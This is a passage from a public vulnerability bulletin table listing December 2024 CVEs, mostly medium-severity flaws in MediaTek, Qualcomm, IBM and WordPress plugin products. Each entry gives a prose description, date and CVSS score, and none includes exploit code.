In soundtrigger, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09142526; Issue ID: MSV-1841. | 2024-12-02 | 6.7 | CVE-2024-20135 |
| MediaTek, Inc.--MT2737, MT6781, MT6789, MT6855, MT6878, MT6879, MT6880, MT6886, MT6890, MT6895, MT6897, MT6980, MT6983, MT6985, MT6989, MT6990, MT8195, MT8370, MT8390, MT8673, MT8676, MT8678, MT8755, MT8775, MT8781, MT8795T, MT8796, MT8798, MT8893 |
In da, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09121847; Issue ID: MSV-1821. | 2024-12-02 | 6.2 | CVE-2024-20136 |
| MediaTek, Inc.--MT2737, MT3605, MT6985, MT6989, MT6990, MT7925, MT7927, MT8518S, MT8532, MT8678 |
In Bluetooth firmware, there is a possible firmware asssert due to improper handling of exceptional conditions. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09001270; Issue ID: MSV-1600. | 2024-12-02 | 6.5 | CVE-2024-20139 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while parsing sensor packets in camera driver, user-space variable is used while allocating memory in kernel and parsing which can lead to huge allocation or invalid memory access. | 2024-12-02 | 6.7 | CVE-2024-33036 |
| Qualcomm, Inc.--Snapdragon |
Information disclosure as NPU firmware can send invalid IPC message to NPU driver as the driver doesn`t validate the IPC message received from the firmware. | 2024-12-02 | 6.1 | CVE-2024-33037 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption when PAL client calls PAL service APIs by passing a random value as handle and the handle is not validated by the service. | 2024-12-02 | 6.7 | CVE-2024-33039 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while invoking redundant release command to release one buffer from user space as race condition can occur in kernel space between buffer release and buffer access. | 2024-12-02 | 6.7 | CVE-2024-33040 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption when multiple threads try to unregister the CVP buffer at the same time. | 2024-12-02 | 6.7 | CVE-2024-33053 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. | 2024-12-03 | 6.5 | CVE-2024-41776 |
| HCL Software--Launch |
HCL Launch stores potentially sensitive information in log files that could be read by a local user with access to HTTP request logs. | 2024-12-06 | 6.2 | CVE-2024-42196 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x contains a a feature that could enable sub accounts or attackers to view and exfiltrate sensitive information from all cloud accounts registered to Ruijie's services | 2024-12-06 | 6.5 | CVE-2024-42494 |
| SonicWall--SMA100 |
A vulnerability in the SonicWall SMA100 SSLVPN firmware 10.2.1.13-72sv and earlier versions allows a remote authenticated attacker can circumvent the certificate requirement during authentication. | 2024-12-05 | 6.3 | CVE-2024-45319 |
| averta--Slider & Popup Builder by Depicter Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel |
The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'addExtraMimeType' function in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.4 | CVE-2024-4633 |
| IBM--QRadar SIEM |
IBM QRadar SIEM 7.5 is vulnerable to stored cross-site scripting. This vulnerability allows authenticated users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2024-12-07 | 6.4 | CVE-2024-47107 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x could allow an attacker to obtain the devices serial number if physically adjacent and sniffing the RAW WIFI signal. | 2024-12-06 | 6.5 | CVE-2024-47146 |
| Samsung Mobile--GamingHub |
Insufficient verification of url authenticity in GamingHub prior to version 6.1.03.4 in Korea, 7.1.02.4 in Global allows remote attackers to enable JavaScript in its webview. | 2024-12-03 | 6.5 | CVE-2024-49418 |
| Palantir--com.palantir.gotham:external-artifacts |
Restricted Views backed objects (OSV1) could be bypassed under specific circumstances due to a software bug, this could have allowed users that didn't have permission to see such objects to view them via Object Explorer directly. This software bug did not impact or otherwise make data available across organizational boundaries nor did it allow for data to be viewed or accessed by unauthenticated users. The affected service have been patched and automatically deployed to all Apollo-managed Foundry instances. | 2024-12-02 | 6.5 | CVE-2024-49581 |
| extendthemes--Colibri Page Builder |
Multiple plugins for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled FancyBox JavaScript library (versions 1.3.4 to 3.5.7) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-5020 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in OroPlatform CMS v5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search parameter. | 2024-12-06 | 6.1 | CVE-2024-50677 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x contains a feature that could enable attackers to invalidate a legitimate user's session and cause a denial-of-service attack on a user's account. | 2024-12-06 | 6.5 | CVE-2024-51727 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking ClearPass Policy Manager |
An authenticated RCE vulnerability in the ClearPass Policy Manager web-based management interface allows remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system. | 2024-12-03 | 6.4 | CVE-2024-51772 |
| Ben Marshall--Jobify - Job Board WordPress Theme |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ben Marshall Jobify - Job Board WordPress Theme allows Stored XSS.This issue affects Jobify - Job Board WordPress Theme: from n/a through 4.2.3. | 2024-12-02 | 6.5 | CVE-2024-52478 |
| SolverWP--Elementor Portfolio Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SolverWP Elementor Portfolio Builder allows DOM-Based XSS.This issue affects Elementor Portfolio Builder: from n/a through 1.0.0. | 2024-12-02 | 6.5 | CVE-2024-52486 |
| WebCodingPlace--Ultimate Classified Listings |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebCodingPlace Ultimate Classified Listings allows Stored XSS.This issue affects Ultimate Classified Listings: from n/a through 1.4. | 2024-12-02 | 6.5 | CVE-2024-52487 |
| Imbasynergy--ImbaChat |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Imbasynergy ImbaChat allows DOM-Based XSS.This issue affects ImbaChat: from n/a through 3.1.4. | 2024-12-02 | 6.5 | CVE-2024-52502 |
| Tailored Web Services--Tailored Tools |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tailored Web Services Tailored Tools allows Stored XSS.This issue affects Tailored Tools: from n/a through 1.8.4. | 2024-12-02 | 6.5 | CVE-2024-52503 |
| Lorex--2K Indoor Wi-Fi Security Camera |
An unauthenticated attacker can perform an out of bounds heap read in the IQ Service (TCP port 9876). This vulnerability has been resolved in firmware version 2.800.0000000.8.R.20241111. | 2024-12-03 | 6.5 | CVE-2024-52545 |
| Lorex--2K Indoor Wi-Fi Security Camera |
An attacker who can execute arbitrary Operating Systems commands, can bypass code signing enforcements in the kernel, and execute arbitrary native code. This vulnerability has been resolved in firmware version 2.800.0000000.8.R.20241111. | 2024-12-03 | 6.7 | CVE-2024-52548 |
| quic-go--quic-go |
quic-go is an implementation of the QUIC protocol in Go. An off-path attacker can inject an ICMP Packet Too Large packet. Since affected quic-go versions used IP_PMTUDISC_DO, the kernel would then return a "message too large" error on sendmsg, i.e. when quic-go attempts to send a packet that exceeds the MTU claimed in that ICMP packet. By setting this value to smaller than 1200 bytes (the minimum MTU for QUIC), the attacker can disrupt a QUIC connection. Crucially, this can be done after completion of the handshake, thereby circumventing any TCP fallback that might be implemented on the application layer (for example, many browsers fall back to HTTP over TCP if they're unable to establish a QUIC connection). The attacker needs to at least know the client's IP and port tuple to mount an attack. This vulnerability is fixed in 0.48.2. | 2024-12-02 | 6.5 | CVE-2024-53259 |
| n/a--n/a |
A hardcoded decryption key in Thinkware Cloud APK v4.3.46 allows attackers to access sensitive data and execute arbitrary commands with elevated privileges. | 2024-12-04 | 6.5 | CVE-2024-53614 |
| bdevs--Generic Elements |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bdevs Generic Elements allows DOM-Based XSS.This issue affects Generic Elements: from n/a through 1.2.3. | 2024-12-02 | 6.5 | CVE-2024-53709 |
| Stachethemes--Advanced Event Manager |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Stachethemes Advanced Event Manager allows Stored XSS.This issue affects Advanced Event Manager: from n/a through 1.1.6. | 2024-12-02 | 6.5 | CVE-2024-53721 |
| Garrett Grimm--Simple Popup |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Garrett Grimm Simple Popup allows DOM-Based XSS.This issue affects Simple Popup: from n/a through 4.6. | 2024-12-02 | 6.5 | CVE-2024-53741 |
| LOOS,Inc.--Arkhe Blocks |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LOOS,Inc. Arkhe Blocks allows Stored XSS.This issue affects Arkhe Blocks: from n/a through 2.27.0. | 2024-12-06 | 6.5 | CVE-2024-53794 |
| Themesflat--Themesflat Addons For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themesflat Themesflat Addons For Elementor allows DOM-Based XSS.This issue affects Themesflat Addons For Elementor: from n/a through 2.2.2. | 2024-12-06 | 6.5 | CVE-2024-53796 |
| The Beaver Builder Team--Beaver Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Beaver Builder Team Beaver Builder allows Stored XSS.This issue affects Beaver Builder: from n/a through 2.8.4.3. | 2024-12-06 | 6.5 | CVE-2024-53797 |
| BoldThemes--Bold Page Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS.This issue affects Bold Page Builder: from n/a through 5.2.1. | 2024-12-06 | 6.5 | CVE-2024-53801 |
| FuturioWP--Futurio Extra |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FuturioWP Futurio Extra allows Stored XSS.This issue affects Futurio Extra: from n/a through 2.0.14. | 2024-12-06 | 6.5 | CVE-2024-53802 |
| brandtoss--WP Mailster |
Missing Authorization vulnerability in brandtoss WP Mailster allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Mailster: from n/a through 1.8.16.0. | 2024-12-06 | 6.5 | CVE-2024-53803 |
| POSIMYTH--WDesignkit |
Unrestricted Upload of File with Dangerous Type vulnerability in POSIMYTH WDesignkit allows Upload a Web Shell to a Web Server.This issue affects WDesignkit: from n/a through 1.0.40. | 2024-12-06 | 6.6 | CVE-2024-53811 |
| WP Travel--WP Travel |
Missing Authorization vulnerability in WP Travel WP Travel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Travel: from n/a through 9.6.0. | 2024-12-06 | 6.5 | CVE-2024-53813 |
| Captivate Audio Ltd--Captivate Sync |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Captivate Audio Ltd Captivate Sync allows Stored XSS.This issue affects Captivate Sync: from n/a through 2.0.22. | 2024-12-06 | 6.5 | CVE-2024-53820 |
| POSIMYTH--The Plus Addons for Elementor Page Builder Lite |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH The Plus Addons for Elementor Page Builder Lite allows DOM-Based XSS.This issue affects The Plus Addons for Elementor Page Builder Lite: from n/a through 5.6.14. | 2024-12-06 | 6.5 | CVE-2024-53823 |
| CodexShaper--Advanced Element Bucket Addons for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexShaper Advanced Element Bucket Addons for Elementor allows Stored XSS.This issue affects Advanced Element Bucket Addons for Elementor: from n/a through 1.0.2. | 2024-12-06 | 6.5 | CVE-2024-54210 |
| Noor alam--Magical Addons For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noor alam Magical Addons For Elementor allows Stored XSS.This issue affects Magical Addons For Elementor: from n/a through 1.2.6. | 2024-12-06 | 6.5 | CVE-2024-54212 |
| zionbuilder.io--WordPress Page Builder Zion Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zionbuilder.io WordPress Page Builder - Zion Builder allows Stored XSS.This issue affects WordPress Page Builder - Zion Builder: from n/a through 3.6.12. | 2024-12-06 | 6.5 | CVE-2024-54213 |
| n/a--n/a |
app/View/GalaxyClusters/cluster_export_misp_galaxy.ctp in MISP through 2.5.2 has stored XSS when exporting custom clusters into the misp-galaxy format. | 2024-12-04 | 6.1 | CVE-2024-54674 |
| n/a--n/a |
app/webroot/js/workflows-editor/workflows-editor.js in MISP through 2.5.2 has stored XSS in the editor interface for an ad-hoc workflow. | 2024-12-04 | 6.1 | CVE-2024-54675 |
| owthub--Library Management System Manage e-Digital Books Library |
The Library Management System - Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the 'value' parameter of the owt_lib_handler AJAX action in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-07 | 6.8 | CVE-2024-8679 |
| wpbits--WPBITS Addons For Elementor Page Builder |
The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-12-04 | 6.4 | CVE-2024-8962 |
| bdthemes--Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) |
The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Lightbox widget in all versions up to, and including, 5.10.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-9058 |
| CMSMasters--CMSMasters Elementor Addon |
The CMSMasters Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.14.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-9694 |
| Google--Android |
In m3326_gps_write and m3326_gps_read of gps.s, there is a possible Out Of Bounds Read due to a missing bounds check. This could lead to a local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 5.5 | CVE-2018-9408 |
| Google--Android |
In ihevcd_parse_slice_header of ihevcd_parse_slice_header.c there is a possible out of bound read due to missing bounds check. This could lead to denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-12-02 | 5.5 | CVE-2018-9423 |
| Google--Android |
In sdp_copy_raw_data of sdp_discovery.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-12-03 | 5.5 | CVE-2018-9441 |
| Google--Android |
In process_service_search_attr_rsp of sdp_discovery.cc, there is a possible out of bound read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-03 | 5.5 | CVE-2018-9449 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. | 2024-12-03 | 5.9 | CVE-2021-29892 |
| Pegasystems--Pega Infinity |
Pega Platform versions 8.1 to Infinity 24.2.0 are affected by an XSS issue with search. | 2024-12-05 | 5.9 | CVE-2024-10716 |
| OpenBSD--OpenBSD |
In OpenBSD 7.5 before errata 009 and OpenBSD 7.4 before errata 022, exclude any '/' in readdir name validation to avoid unexpected directory traversal on untrusted file systems. | 2024-12-05 | 5 | CVE-2024-10933 |
| pickplugins--Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins |
The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.58 via the wp_ajax_nopriv_related_post_ajax_get_post_ids AJAX action. This makes it possible for unauthenticated attackers to extract sensitive data including titles of posts in draft status. | 2024-12-05 | 5.3 | CVE-2024-10937 |
| SICK AG--SICK InspectorP61x |
The authentication process to the web server uses a challenge response procedure which inludes the nonce and additional information. This challenge can be used several times for login and is therefore vulnerable for a replay attack. | 2024-12-06 | 5.6 | CVE-2024-11022 |
| burgthaleratsirconic--SG Helper |
The SG Helper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in version 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-12-04 | 5.5 | CVE-2024-11093 |
| nimeshrmr--WP Private Content Plus |
The WP Private Content Plus plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-12-06 | 5.3 | CVE-2024-11292 |
| Hi e-learning--Learning Management System (LMS) |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Hi e-learning Learning Management System (LMS) allows Reflected XSS.This issue affects Learning Management System (LMS): before 06.12.2024. | 2024-12-06 | 5.4 | CVE-2024-11321 |
| fatcatapps--AWeber Forms by Optin Cat |
The AWeber Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-03 | 5.2 | CVE-2024-11325 |
| Red Hat--Red Hat Trusted Artifact Signer |
A flaw was found in Rustls 0.23.13 and related APIs. This vulnerability allows denial of service (panic) via a fragmented TLS ClientHello message. | 2024-12-06 | 5.3 | CVE-2024-11738 |
| Drupal--Drupal Core |
A vulnerability in Drupal Core allows File Manipulation.This issue affects Drupal Core: from 10.0.0 before 10.2.10. | 2024-12-05 | 5.9 | CVE-2024-11942 |
| akirk--Friends |
The Friends plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to send arbitrary friend requests on behalf of another website, accept the friend request for the targeted website, and then communicate with the site as an accepted friend. | 2024-12-06 | 5.3 | CVE-2024-12028 |
| OpenHarmony--OpenHarmony |
in OpenHarmony v4.0.0 and prior versions allow a local attacker cause information leak through out-of-bounds Read. | 2024-12-03 | 5.5 | CVE-2024-12082 |
| Devolutions--Server |
Incorrect permission assignment in the user migration feature in Devolutions Server 2024.3.8.0 and earlier allows users to retain their old permission sets. | 2024-12-04 | 5 | CVE-2024-12151 |
| code-projects--Hotel Management System |
A vulnerability has been found in code-projects Hotel Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the component Administrator Login Password Handler. The manipulation of the argument Str2 leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 5.3 | CVE-2024-12185 |
| code-projects--Hotel Management System |
A vulnerability was found in code-projects Hotel Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file hotelnew.c of the component Available Room Handler. The manipulation of the argument admin_entry leads to stack-based buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 5.3 | CVE-2024-12186 |
| MSI--Dragon Center |
A vulnerability, which was classified as problematic, was found in MSI Dragon Center up to 2.0.146.0. This affects the function MmUnMapIoSpace in the library NTIOLib_X64.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. Upgrading to version 2.0.148.0 is able to address this issue. It is recommended to upgrade the affected component. | 2024-12-05 | 5.5 | CVE-2024-12227 |
| nshowketgmailcom--Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal |
The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'save_settings', 'export_csv', and 'simpleecommcart-action' actions in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the plugins settings and retrieve order and log data (which is also accessible to unauthenticated users). | 2024-12-07 | 5.4 | CVE-2024-12253 |
| Cisco--Cisco NX-OS Software |
A vulnerability in the bootloader of Cisco NX-OS Software could allow an unauthenticated attacker with physical access to an affected device, or an authenticated, local attacker with administrative credentials, to bypass NX-OS image signature verification. This vulnerability is due to insecure bootloader settings. An attacker could exploit this vulnerability by executing a series of bootloader commands. A successful exploit could allow the attacker to bypass NX-OS image signature verification and load unverified software. | 2024-12-04 | 5.2 | CVE-2024-20397 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 could be vulnerable to malicious file upload by not validating the type of file uploaded to Journal entry attachments. Attackers can make use of this weakness and upload malicious executable files into the system that can be sent to victims for performing further attacks. | 2024-12-03 | 5.5 | CVE-2024-25019 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 is vulnerable to malicious file upload by allowing unrestricted filetype attachments in the Journal entry page. Attackers can make use of this weakness and upload malicious executable files into the system and can be sent to victims for performing further attacks. | 2024-12-03 | 5.5 | CVE-2024-25020 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 exposes server details that could allow an attacker to obtain information of the application environment to conduct further attacks. | 2024-12-03 | 5.3 | CVE-2024-25035 |
| HCL Software--Nomad server on Domino |
The HTTP host header can be manipulated and cause the application to behave in unexpected ways. Any changes made to the header would cause the request to be sent to a completely different domain/IP address. | 2024-12-06 | 5.3 | CVE-2024-30129 |
| IBM--Db2 for Linux, UNIX and Windows |
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated user to cause a denial of service with a specially crafted query due to improper memory allocation. | 2024-12-07 | 5.3 | CVE-2024-37071 |
| element-hq--synapse |
Synapse is an open-source Matrix homeserver. Synapse before version 1.106 allows, by design, unauthenticated remote participants to trigger a download and caching of remote media from a remote homeserver to the local media repository. Such content then also becomes available for download from the local homeserver in an unauthenticated way. The implication is that unauthenticated remote adversaries can use this functionality to plant problematic content into the media repository. Synapse 1.106 introduces a partial mitigation in the form of new endpoints which require authentication for media downloads. The unauthenticated endpoints will be frozen in a future release, closing the attack vector. | 2024-12-03 | 5.3 | CVE-2024-37303 |
| tassos.gr--Convert Forms component for Joomla |
Reflected Cross site scripting vulnerability in Convert Forms component for Joomla in versions before 4.4.8. | 2024-12-04 | 5.4 | CVE-2024-40745 |
| IBM--Db2 for Linux, UNIX and Windows |
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query. | 2024-12-07 | 5.3 | CVE-2024-41762 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. | 2024-12-03 | 5.9 | CVE-2024-41775 |
| Samsung Mobile--Samsung Mobile Devices |
Out-of-bounds write in libswmfextractor.so prior to SMR Dec-2024 Release 1 allows local attackers to execute arbitrary code. | 2024-12-03 | 5.9 | CVE-2024-49410 |
| Samsung Mobile--Samsung Mobile Devices |
Improper input validation in Settings prior to SMR Dec-2024 Release 1 allows local attackers to broadcast signal for discovering Bluetooth on Galaxy Watch. | 2024-12-03 | 5.5 | CVE-2024-49412 |
| n/a--n/a |
Firepad through 1.5.11 allows remote attackers, who have knowledge of a pad ID, to retrieve both the current text of a document and all content that has previously been pasted into the document. NOTE: in several similar products, this is the intentional behavior for anyone who knows the full document ID and corresponding URL. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | 2024-12-04 | 5.3 | CVE-2024-51210 |
| Richard K Miller--What Would Seth Godin Do |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Richard K Miller What Would Seth Godin Do allows Stored XSS.This issue affects What Would Seth Godin Do: from n/a through 2.1.1. | 2024-12-02 | 5.9 | CVE-2024-51900 |
| Udi Dollberg--Add Chat App Button |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Udi Dollberg Add Chat App Button allows Stored XSS.This issue affects Add Chat App Button: from n/a through 2.1.5. | 2024-12-02 | 5.9 | CVE-2024-52489 |
| Sanil Shakya--Sticky Social Icons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sanil Shakya Sticky Social Icons allows Stored XSS.This issue affects Sticky Social Icons: from n/a through 1.2.1. | 2024-12-02 | 5.9 | CVE-2024-52491 |
| Gopi Ramasamy--Image horizontal reel scroll slideshow |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gopi Ramasamy Image horizontal reel scroll slideshow allows Stored XSS.This issue affects Image horizontal reel scroll slideshow: from n/a through 13.4. | 2024-12-02 | 5.9 | CVE-2024-52492 |
| Josh Leuze--Meteor Slides |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Josh Leuze Meteor Slides allows Stored XSS.This issue affects Meteor Slides: from n/a through 1.5.7. | 2024-12-02 | 5.9 | CVE-2024-52493 |
| Matt Varone, Tim Berneman--Dynamic "To Top" |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt Varone, Tim Berneman Dynamic "To Top" allows Stored XSS.This issue affects Dynamic "To Top": from 3.5.2 through n/a. | 2024-12-02 | 5.9 | CVE-2024-52494 |
| Lorex--2K Indoor Wi-Fi Security Camera |
An unauthenticated attacker can perform a null pointer dereference in the DHIP Service (UDP port 37810). This vulnerability has been resolved in firmware version 2.800.0000000.8.R.20241111. | 2024-12-03 | 5.3 | CVE-2024-52546 |
| Planet Technology--Planet WGS-804HPT |
The affected product is vulnerable to an integer underflow. An unauthenticated attacker could send a malformed HTTP request, which could allow the attacker to crash the program. | 2024-12-06 | 5.3 | CVE-2024-52558 |
| n/a--n/a |
Itsourcecode Online Discussion Forum Project v.1.0.0 is vulnerable to Cross Site Scripting (XSS) via /bcc_forum/members/home.php. | 2024-12-04 | 5.4 | CVE-2024-52676 |
| n/a--n/a |
A SQL injection vulnerability was found in PHPGURUKUL Vehicle Parking Management System v1.13 in /users/view-detail.php. This vulnerability affects the viewid parameter, where improper input sanitization allows attackers to inject malicious SQL queries. | 2024-12-02 | 5.4 | CVE-2024-53364 |
| n/a--n/a |
Sysax Multi Server 6.99 is vulnerable to Cross Site Scripting (XSS) via the /scgi?sid parameter. | 2024-12-02 | 5.4 | CVE-2024-53459 |
| n/a--n/a |
An issue in the action_listcategories() function of Sangoma Asterisk v22/22.0.0/22.0.0-rc1/22.0.0-rc2/22.0.0-pre1 allows attackers to execute a path traversal. | 2024-12-02 | 5.5 | CVE-2024-53566 |
| SonicWall--SMA100 |
Use of cryptographically weak pseudo-random number generator (PRNG) vulnerability in the SonicWall SMA100 SSLVPN backup code generator that, in certain cases, can be predicted by an attacker, potentially exposing the generated secret. | 2024-12-05 | 5.3 | CVE-2024-53702 |
| AutoQuiz--AI Quiz |
Missing Authorization vulnerability in AutoQuiz AI Quiz allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects AI Quiz: from n/a through 1.1. | 2024-12-02 | 5.3 | CVE-2024-53708 |
| Abdul Hakeem--Build App Online |
Cross-Site Request Forgery (CSRF) vulnerability in Abdul Hakeem Build App Online allows Cross Site Request Forgery.This issue affects Build App Online: from n/a through 1.0.22. | 2024-12-02 | 5.4 | CVE-2024-53751 |
| P. Roy--WP Revisions Manager |
Cross-Site Request Forgery (CSRF) vulnerability in P. Roy WP Revisions Manager allows Cross Site Request Forgery.This issue affects WP Revisions Manager: from n/a through 1.0.2. | 2024-12-02 | 5.4 | CVE-2024-53761 |
| Andy Moyle--Church Admin |
Missing Authorization vulnerability in Andy Moyle Church Admin allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Church Admin: from n/a through 5.0.8. | 2024-12-06 | 5.3 | CVE-2024-53795 |
| WpMaspik--Maspik Spam blacklist |
Missing Authorization vulnerability in WpMaspik Maspik - Spam blacklist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Maspik - Spam blacklist: from n/a through 2.2.7. | 2024-12-06 | 5.4 | CVE-2024-53806 |
| WPSight--WPCasa |
Missing Authorization vulnerability in WPSight WPCasa allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WPCasa: from n/a through 1.2.13. | 2024-12-06 | 5.3 | CVE-2024-53826 |
| erlang--otp |
